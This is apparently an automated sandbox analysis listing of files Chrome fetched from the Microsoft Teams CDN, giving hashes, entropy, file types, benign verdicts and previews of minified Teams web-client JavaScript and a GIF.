                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[924039],{924039:(a,l,c)=>{c.d(l,{ZRL:()=>Z,TL0:()=>v,Co_:()=>e,Y$h:()=>A,xEh:()=>H,uGR:()=>M,A$C:()=>i,hs2:()=>V,tHQ:()=>m,pi9:()=>L,Dn5:()=>n});var h=c(693935);const Z=(0,h.U)("Vote20Filled","20",["M13.5 9h-1.27l1.73-3a1 1 0 0 0-.36-1.37L11 3.13a1 1 0 0 0-1.37.37l-2.5 4.33A1 1 0 0 0 7.26 9H6.5a.5.5 0 0 0 0 1h7a.5.5 0 0 0 0-1Zm-3-5 2.6 1.5L11.08 9H9.16L8 8.33 10.5 4Zm4.04 3-.58 1h.54l2.25 3H3.25L5.5 8h.4a1 1 0 0 1 .08-.17L6.46 7H5.5a1 1 0 0 0-.8.4l-2.5 3.33a1 1 0 0 0-.2.6V16a1 1 0 0 0 1 1h14a1 1 0 0 0 1-1v-4.67a1 1 0 0 0-.2-.6L15.3 7.4a1 1 0 0 0-.76-.4Z"]),v=(0,h.U)("Vote20Regular","20",["M12.23 9h1.27a.5.5 0 0 1 0 1h-7a.5.5 0 0 1 0-1h.76a1 1 0 0 1-.13-1.17l2.5-4.33A1 1 0 0 1 11 3.13l2.6 1.5A1 1 0 0 1 13.96 6l-1.73 3Zm.87-3.5L10.5 4 8 8.33 9.16 9h1.92l2.02-3.5Zm.86 2.5.58-1a1 1 0 0 1 .76.4l2.5 3.33a1 1 0 0 1 .2.6V16a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1v-4.67a1 1 0 0 1 .2-.6L4.7 7.4a
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):957066
                                                                                                                                                                                                                                                                            Entropy (8bit):5.324141683516416
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12288:qkZVWaypSiX3eba6vZ/0rf8swf27hKeP0Ch9:qCVWaypSyeba6B/0rf8twhKeNh9
                                                                                                                                                                                                                                                                            MD5:032B7E80C825970D762F0930D0321D9A
                                                                                                                                                                                                                                                                            SHA1:29E5CF7A7A31E6CB32DE8E2EDC6879188F958CE8
                                                                                                                                                                                                                                                                            SHA-256:EB63B170FA18F615753E14C6925CE067A2B3D28118E42CA523785F4D21F9BFFB
                                                                                                                                                                                                                                                                            SHA-512:41CEDA890C55A373FDB82F8572FA638985BC7E21057F9292F24EA7FF6FE4AECCAC821969046F3B1067FAB3B1D74443614D660835913CC66E58A1FD56A72EDBED
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/268910-5348284eff7cf7d6.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[268910],{669130:(e,r,o)=>{o.d(r,{b:()=>n});var i=o(152608);const t={bodyFontFamily:"-apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Web', sans-serif",codeFontFamily:"'Cascadia Mono', Consolas, ui-monospace, Menlo, Monaco, monospace",colors:o(634855).j,colorScheme:{brand:{background4:"#464775"}}},n={siteVariables:{...i.k.siteVariables,...t}}},388136:(e,r,o)=>{o.d(r,{$:()=>w});var i=o(152608),t=o(954057);const n={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{statusNote:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Alert","root");return{...o&&{backgroundColor:n.background4},...i&&a(i,e)}}},a={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{isRosterHeaderMoreMenuButton:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Button","root");return{...o&&{backgroundColor:n.background2},...i&&a(i,e)}}},d={root:e=>{cons
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):488546
                                                                                                                                                                                                                                                                            Entropy (8bit):5.627318568051973
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:i/JNz8JPeINQKxlLdgK5EkZyTdTIxVhl3qaMZZ2H+LLIIHW0F:45KCkZ7r3qaMZZ2H+LLIIHn
                                                                                                                                                                                                                                                                            MD5:59CB1B0DCFFAFDC09EDB8D088D756A86
                                                                                                                                                                                                                                                                            SHA1:0DD58AA9FEBAACE29839418E4D5D8C12FBE253DB
                                                                                                                                                                                                                                                                            SHA-256:52C61243F0C75D908D691EEF58E6DFB3FA49D6A19F02040C20DB452D98E3676D
                                                                                                                                                                                                                                                                            SHA-512:FC6584D069EA5D4D412F2E5C95BA72D51D669F5CF99E6EB9AC74CC2E0A2EAA0F95CDBC9C704E8A5548D421B1702B51BDE3938950046701CA6E8D387004EFB186
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725236],{744465:(module,__unused_webpack_exports,__webpack_require__)=>{var f;f=function(){var define,module,exports;return function e(o,t,r){function n(i,a){if(!t[i]){if(!o[i]){if(d)return d(i,!0);var g=new Error("Cannot find module '"+i+"'");throw g.code="MODULE_NOT_FOUND",g}var s=t[i]={exports:{}};o[i][0].call(s.exports,(function(e){return n(o[i][1][e]||e)}),s,s.exports,e,o,t,r)}return t[i].exports}for(var d=void 0,i=0;i<r.length;i++)n(r[i]);return n}({1:[function(require,module,exports){(function(global){(function(){var $jscomp=$jscomp||{};$jscomp.scope={},$jscomp.createTemplateTagFirstArg=function(e){return e.raw=e},$jscomp.createTemplateTagFirstArgWithRaw=function(e,o){return e.raw=o,e},$jscomp.arrayIteratorImpl=function(e){var o=0;return function(){return o<e.length?{done:!1,value:e[o++]}:{done:!0}}},$jscomp.arrayIterator=function(e){return{next:$jscomp.arrayIteratorImpl(e)}},$jsco
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (25884)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):25992
                                                                                                                                                                                                                                                                            Entropy (8bit):5.277039269803265
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:vdt+mv1OEw2byKlzm5vZvY9qk8ESiFsvYSICUdn4SPFH:jO+eKR
                                                                                                                                                                                                                                                                            MD5:6E821E654350985785C0243CC4D32584
                                                                                                                                                                                                                                                                            SHA1:C46D939CE912758DBFF0E9066F4138DBF6DF2764
                                                                                                                                                                                                                                                                            SHA-256:2643ACE4FBDF1B99DDAAAD0EB0C4ED4DB1BC2E90D09F0427763814BB4FFA312C
                                                                                                                                                                                                                                                                            SHA-512:D866EB71CB1FE03EF605C84E84D94E46AA99C7602C1A69B6A5BFD37BEC977FF67E4D386F83C828C759381715BA4F84B14EAD22A5E5CDEE64D6BE2A05712A02F0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/487132-ea50a7e46f75ed5b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[487132],{825268:(e,t,o)=>{o.d(t,{_:()=>s});var i=o(362328);const n={kind:"Document",get definitions(){const e=(0,i.G)("fragment emoticonCategoryFragments on EmoticonCategory {id,title,description,count}");return delete this.definitions,this.definitions=e.definitions}},s={kind:"Document",get definitions(){const e=(0,i.G)("query emoticonCategories($includeRecentCategory:Boolean!) {emoticonCategories(includeRecentCategory:$includeRecentCategory) {...emoticonCategoryFragments}}");return delete this.definitions,this.definitions=[...e.definitions,...n.definitions]}}},487132:(e,t,o)=>{o.d(t,{p5:()=>U,xD:()=>A,t3:()=>P,BI:()=>q,UI:()=>L,eQ:()=>N,BW:()=>B,gE:()=>x,gj:()=>F,Z4:()=>$,ss:()=>R,R4:()=>b,KM:()=>_});var i=o(364819),n=o(332752),s=o(127066),r=o(757060),a=o(483330),c=o(997469),d=o(433245),m=o(751067),l=o(425169),h=o(8607),u=o(573990),g=o(956400),f=o(236347),y=o(362328);const p
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8075)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):8183
                                                                                                                                                                                                                                                                            Entropy (8bit):5.452879557388358
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:p5nTsCC5OZ/ri3k3OaRBfhKBQbM0TWFSOI+i:pNTbC5WriUeOBfhKWo0TWsV+i
                                                                                                                                                                                                                                                                            MD5:D0C1845DD5B6BDF7C4C9DA9D9482E8D2
                                                                                                                                                                                                                                                                            SHA1:EFA57190BBB3231B218AEAC83F94FDF886439B2D
                                                                                                                                                                                                                                                                            SHA-256:BF0F629CCA5CA0A776BD1F55B52130816E68DAA080BDB2E97F41505558180858
                                                                                                                                                                                                                                                                            SHA-512:8C79FA6E9CE7A416B22581EEB2837856A40ECFE10B8392CBD00D38BFE25528F75193582A879C2D4E5CEC4426D5837C7395EAF492EB352517371316712CBA80AD
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/626119-03d9192fddf72b86.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[626119],{306747:(e,n,t)=>{t.d(n,{W:()=>O});var o=t(513432),r=t(903561),s=t(910889),a=t(437932),u=t(411947),c=t(589256),l=t(602835),i=t(132915),p=t(585536),v=t(257495),f=t(953291),d=t(35871),m=t(553864),g=t(868976),h=t(719914),k=t(514795);const b=["after","after-bottom","before-top","before","before-bottom","above"],C=e=>{const[n,t]=(0,c.i)({state:e.checkedValues,defaultState:e.defaultCheckedValues,initialState:{}});return[n,(0,l.D)(((n,{name:o,checkedItems:r})=>{var s;null===(s=e.onCheckedValueChange)||void 0===s||s.call(e,n,{name:o,checkedItems:r}),t((e=>({...e,[o]:r})))}))]},y=e=>{const{targetDocument:n}=(0,d.useFluent_unstable)(),t=(0,g.tv)((e=>e.setOpen)),r=(0,l.D)(((n,t)=>{var o;return null===(o=e.onOpenChange)||void 0===o?void 0:o.call(e,n,t)})),s=o.useRef(!1),[a,u]=(0,c.i)({state:e.open,defaultState:e.defaultOpen,initialState:!1}),k=(0,l.D)(((n,o)=>{const s=n instanceo
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (55961)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):56068
                                                                                                                                                                                                                                                                            Entropy (8bit):5.258949420304227
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ko5r8r5Nxx50EOmgy5dY+WqZvkExz8YC4v7n6:kIr8r5NxP0EOmgy5dfWqZvkMz8YVv7n6
                                                                                                                                                                                                                                                                            MD5:826305738A9D8121EEE29B3EA61F3FFD
                                                                                                                                                                                                                                                                            SHA1:3242FC92155409FEA5D998E110DAA0FE0F21C774
                                                                                                                                                                                                                                                                            SHA-256:188AB9EBCAA1E04701757D76584D0A45B2CA650E11967C9873C592EA6CC70ED5
                                                                                                                                                                                                                                                                            SHA-512:2F57668410A3E659A74E6DEBADE66BC3F1D1FD2C70F45E6153D7B0F665882CB5F4436903F315A78A75A1D148317C3B61FBF76DFD62A18F387635041C3BE516B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/33834-5ec43dff5d85c08b.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[33834,425104],{33834:(e,t,n)=>{n.d(t,{DO:()=>fe});var r=n(615582),o=n(296920);function i(e,t,n){var i,s=e instanceof Error?e:new Error("Unexpected error value: "+(0,r.A)(e));return Array.isArray(s.path)?s:new o.e(s.message,null!==(i=s.nodes)&&void 0!==i?i:t,s.source,s.positions,n,s)}var s=n(189687),a=n(132786),u=n(691143),l=n(18542),c=n(710773);function f(e,t){if(!Boolean(e))throw new Error(null!=t?t:"Unexpected invariant triggered.")}var d=n(3929),p=n(756976);function h(e,t,n,r){if(!e)return;if(e.kind===s.b.VARIABLE){const n=e.name.value;if(null==r||void 0===r[n])return;const o=r[n];if(null===o&&(0,d.bd)(t))return;return o}if((0,d.bd)(t)){if(e.kind===s.b.NULL)return;return h(e,(0,d.oA)(t),n,r)}if(e.kind===s.b.NULL)return null;if((0,d.Fs)(t)){const o=(0,d.oA)(t);if(e.kind===s.b.LIST){const t=[];for(const i of e.values)if(v(i,r)){if((0,d.bd)(o))return;t.push(null)}else{const e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):73015
                                                                                                                                                                                                                                                                            Entropy (8bit):5.301651481165213
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:hrYXUP+dcYtaNHGuq+WMcfELOn+qfZ3EQ00L5XkkiE46+Hdvz//oGSRcQN:pYXU2GZx5yJnzLlX6RARcQ
                                                                                                                                                                                                                                                                            MD5:301B9C2ED60017E2237E812DBAF59933
                                                                                                                                                                                                                                                                            SHA1:3ACCE8E7A8E9B381FA31E59D03D38CEC33622758
                                                                                                                                                                                                                                                                            SHA-256:205DBDCD029381218CB78EB24ADCC072190D8B979A870CF80EC33FD82DCE6ED8
                                                                                                                                                                                                                                                                            SHA-512:DEAED496ADC8707B80549BB91F8A5CC1E1710D09AE984242B7853DD8ECD74B848E5CDB95CA6182DE95A8944F373E1C040909937B0D88FC39BBF2FED32FD976E6
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[492696],{589708:(e,t,a)=>{a.d(t,{j:()=>$});var r=a(802756),i=a(60214),o=a(625292),n=a(923226),s=a(848020),c=a(448211),d=a(510139),u=a(935008),l=a(366603),h=a(48410),g=a(191914),_=a(955262),m=a(417694),p=a(847431),S=a(703478);const A=(e,t)=>(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:(0,d.Nw)(e),correlationId:t}),v=(e,t,a,r)=>{if(r?.("enablePostMessageAuthentication")&&t.hasPostMessageAgent){const t=e.postMessageConfig;if(!t)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderLoadError,isExpected:!1,message:"When enabling post message based authentication, postMessageConfig must be provided in the experience configuration.",correlationId:a});if(0===t.length)throw(0,l.$5)({context:"Authentication",subContext:"loadAuthProvider",errorCode:p.tG.AuthProviderL
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (36105)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):36213
                                                                                                                                                                                                                                                                            Entropy (8bit):5.280487430340897
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:L0Wz+Jg23Bw8AhjErb8NAdwQhLzMpzhnzaacp3BJ6d2g8Kx:wQxAdwQlJ6Qg8i
                                                                                                                                                                                                                                                                            MD5:14F41B0CBDA1826E39A1EDA1D483D99B
                                                                                                                                                                                                                                                                            SHA1:A0E35CDC2EBBD53FCD22FC6E7108B018FA1740B5
                                                                                                                                                                                                                                                                            SHA-256:1A5C8B694DBF4FE51E91A56DFEB48A6B034E40B31424A1777DE12C515EC1971A
                                                                                                                                                                                                                                                                            SHA-512:34AEC1329E8B73EE01EB11904A365361B8178658849B97DEDE85D6B83E1AA5B69ECDEA52FAB77EB810DD3795BF0F08BC4CB1577132A84BA3A4FC05081A062155
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[690936],{297689:(e,t,s)=>{var r;s.d(t,{MP:()=>r,C9:()=>i}),function(e){e.default="default",e.skypeConCore="conCore",e.mediaAgent="mediaAgent",e.CDL="CDL",e.copilot="copilot"}(r||(r={}));Object.entries(r).map((([e,t])=>({label:e,value:t})));const i=new Set(["AppInfo.ClientType","Window.Type","Panel.Context","Session.TelemetryWorkerType","AppInfo.ExpIds","UserInfo.ETag","UserInfo.HostETag","Window.Type","AppInfo.Version","AppInfo.ExperienceName"])},336223:(e,t,s)=>{s.d(t,{M:()=>C});var r=s(18863),i=s(156054),n=s(239857),a=s(368848);const o={maxStorageSizeInBytes:5e6,storageKeyPrefix:"Teams:telemetry-instrumentation-offline-storage",minPersistenceLevel:2,eventsLimitInMem:null,inMemoMaxTime:15e3,inStorageMaxTime:1008e4,maxRetry:1,maxBatchsize:63e3,maxSentBatchInterval:15e3};var h;!function(e){e[e.ONLINE=1]="ONLINE",e[e.OFFLINE=2]="OFFLINE"}(h||(h={}));const l=["admin","Admin","AD
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18896)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):19004
                                                                                                                                                                                                                                                                            Entropy (8bit):5.306974413145656
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:G4AQE0IXIfeJgWCljWwXS+YuD/CEz5p+ZExpUZKVDziCzxA5R2qe9RoqrS:u0lWCrD/CEdHi9PT
                                                                                                                                                                                                                                                                            MD5:C685FFC1C5CE457B25393165744C7D08
                                                                                                                                                                                                                                                                            SHA1:6469598AEFA52571D810FF03E52F00676D8C4F6D
                                                                                                                                                                                                                                                                            SHA-256:686C2F561FFC20EB44E792F2F5F477409B029F2F4AEB7EF832E211AFB1691F62
                                                                                                                                                                                                                                                                            SHA-512:FE85EEB7E62B7ECE8192FFD481C93CBBB80CC2C3E135F8EEB8E40E07FC605DE831C028F9EDBCA0304B351169347426A63FC6015C4E637CE46ED32B302A0DC273
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[534940],{796767:(e,t,n)=>{n.d(t,{S:()=>i});var a=n(953543),r=n(504405),i=function(e){var t;return{attributes:{wrapper:{role:"presentation","data-tabs":"true"},root:(t={role:"tab",tabIndex:0,"aria-selected":!!e.active,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-controls":e["aria-controls"],"aria-disabled":e.disabled},t[r.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]}}}}}},584667:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(888846),r=n(796767),i=function(){return{attributes:{root:{role:"tablist"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:r.S}}}},510533:(e,t,n)=>{n.d(t,{FN:()=>G,ih:()=>H,LA:()=>D});var a=n(112882),r=n.n(a),i=n(109161),o=n.n(i),s=n(936666),l=n(953543),c=function(e){return{att
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):3620
                                                                                                                                                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7088)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):7196
                                                                                                                                                                                                                                                                            Entropy (8bit):5.537796068488159
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:mXLuuTV/Kl2Vr4qcyQnCjzuKJuiuhQ0u75XhsXSN4LrFfyiRgyCmgr/epumHJ2V2:PuMVfzCOVnk75XPN4tjVAWxVkFkGeMa
                                                                                                                                                                                                                                                                            MD5:615EE68C746BD29AAE63F5CD3B9B7805
                                                                                                                                                                                                                                                                            SHA1:EF9AE532F5F070415990D6D24F15EE11B1179093
                                                                                                                                                                                                                                                                            SHA-256:DAFAC5A5CCFF385614FFFD5E0457F5857C5163151D8EB44CC23D205AB1A43417
                                                                                                                                                                                                                                                                            SHA-512:BB1AE12239514377A4EBDE3B2A6C67AE808A4F47E999D0538B6AFE6300E4EB32816B49EB081CCCEDC7C8BC507D7B0F125AEBAE234B5E7401C06D5918A0734F07
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/164175-1980a13e9bd6c49d.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[164175],{469754:e=>{var t,n=function(){function e(e,t){if("function"!=typeof e)throw new TypeError("DataLoader must be constructed with a function which accepts Array<key> and returns Promise<Array<value>>, but got: "+e+".");this._batchLoadFn=e,this._maxBatchSize=function(e){var t=!e||!1!==e.batch;if(!t)return 1;var n=e&&e.maxBatchSize;if(void 0===n)return 1/0;if("number"!=typeof n||n<1)throw new TypeError("maxBatchSize must be a positive number: "+n);return n}(t),this._batchScheduleFn=function(e){var t=e&&e.batchScheduleFn;if(void 0===t)return r;if("function"!=typeof t)throw new TypeError("batchScheduleFn must be a function: "+t);return t}(t),this._cacheKeyFn=function(e){var t=e&&e.cacheKeyFn;if(void 0===t)return function(e){return e};if("function"!=typeof t)throw new TypeError("cacheKeyFn must be a function: "+t);return t}(t),this._cacheMap=function(e){var t=!e||!1!==e.cach
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14080)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):14188
                                                                                                                                                                                                                                                                            Entropy (8bit):4.548444802364332
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:morrVCmTcgu/dwwIXxmpnNnkkdYv+WRFqFK/WP5MABOH8P2oKullWqFjhRONOb+t:morrVrcgAIXxmEv+WDJw5MAB+B2hRcJt
                                                                                                                                                                                                                                                                            MD5:EAE6D5D8A335D7E78B87A584045664BE
                                                                                                                                                                                                                                                                            SHA1:16F37B3649C086DBC522F19D34C88F135DD62886
                                                                                                                                                                                                                                                                            SHA-256:332670B50B9E5C00C333394FE7F1660E95B91A3BAC311A32B07C4623AD014BED
                                                                                                                                                                                                                                                                            SHA-512:D26C7E0204E471EDFED62FCCD2384B74C70F40097BB0D9C03045279D277F61FD3B3B851B0037E8BE4A046A810D99650EA53A2722BCDE08F6BBD6AF85E1E05C74
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/499319-ba112383185f5946.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[499319],{499319:(a,l,c)=>{c.d(l,{fG6:()=>Z,emQ:()=>h,T$n:()=>r,Tw6:()=>m,nzA:()=>C,t3G:()=>L,kNP:()=>M,mXP:()=>U,CDg:()=>g,jvo:()=>u,FUA:()=>R,N5_:()=>A,orE:()=>o,SUw:()=>k,D7b:()=>n,xZD:()=>t,RaO:()=>i,FHz:()=>v,ghe:()=>s,kt0:()=>H,ZmR:()=>b,i3f:()=>d,pgR:()=>w,GxZ:()=>F,hoY:()=>p,rLf:()=>D,geq:()=>_,cmU:()=>V,sCR:()=>f,bP_:()=>G,nbA:()=>P,ba0:()=>S,nb6:()=>q,KOR:()=>N,qGP:()=>O,g4$:()=>x,nbk:()=>z,NaX:()=>Q,Aow:()=>T,s81:()=>X,oIL:()=>$,gcA:()=>j,qrO:()=>B,mse:()=>E,JcD:()=>I});var e=c(693935);const Z=(0,e.U)("ChannelShare20Regular","20",["M3 5.5A2.5 2.5 0 0 1 5.5 3h5A2.5 2.5 0 0 1 13 5.5a.5.5 0 0 1-1 0c0-.83-.67-1.5-1.5-1.5h-5C4.67 4 4 4.67 4 5.5v5c0 .83.67 1.5 1.5 1.5h4.51a2.25 2.25 0 1 1 .12 1H5.5A2.5 2.5 0 0 1 3 10.5v-5Zm8 6.75a1.25 1.25 0 1 0 2.5 0 1.25 1.25 0 0 0-2.5 0ZM7.5 14a.5.5 0 0 0-.5.5A2.5 2.5 0 0 0 9.5 17h5a2.5 2.5 0 0 0 2.5-2.5v-5A2.5 2.5 0 0 0 14.5 7H9.87A2.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (56925)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):57033
                                                                                                                                                                                                                                                                            Entropy (8bit):5.526684249472521
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:GkxxRkotyP4Iu7O2nVb+uwhZc8UYwV7/Lohypjw3LzMjHeNVZPFO9/L3/kbplZhw:GuxRkooe8U7xoMpsN+wNF7h+R35xwwv
                                                                                                                                                                                                                                                                            MD5:F7BC86C2B86C34A3986592D49901F84E
                                                                                                                                                                                                                                                                            SHA1:C8D46651B56797D52A53B8BC662EEBE9B2A69CE0
                                                                                                                                                                                                                                                                            SHA-256:5026CAE4341809EA98DE562F605491D577C97FB7B475A84F797FE10B5C36875E
                                                                                                                                                                                                                                                                            SHA-512:B9180A875C20B0DD395405B62041E479132C2CADEAEABB041EEE06CDD5415ED2B1C76409561F177AD36110C646710A6A051FBEB24271DBB4E717E8EDBCF35D30
                                                                                                                                                                                                                                                                            Malicious:false
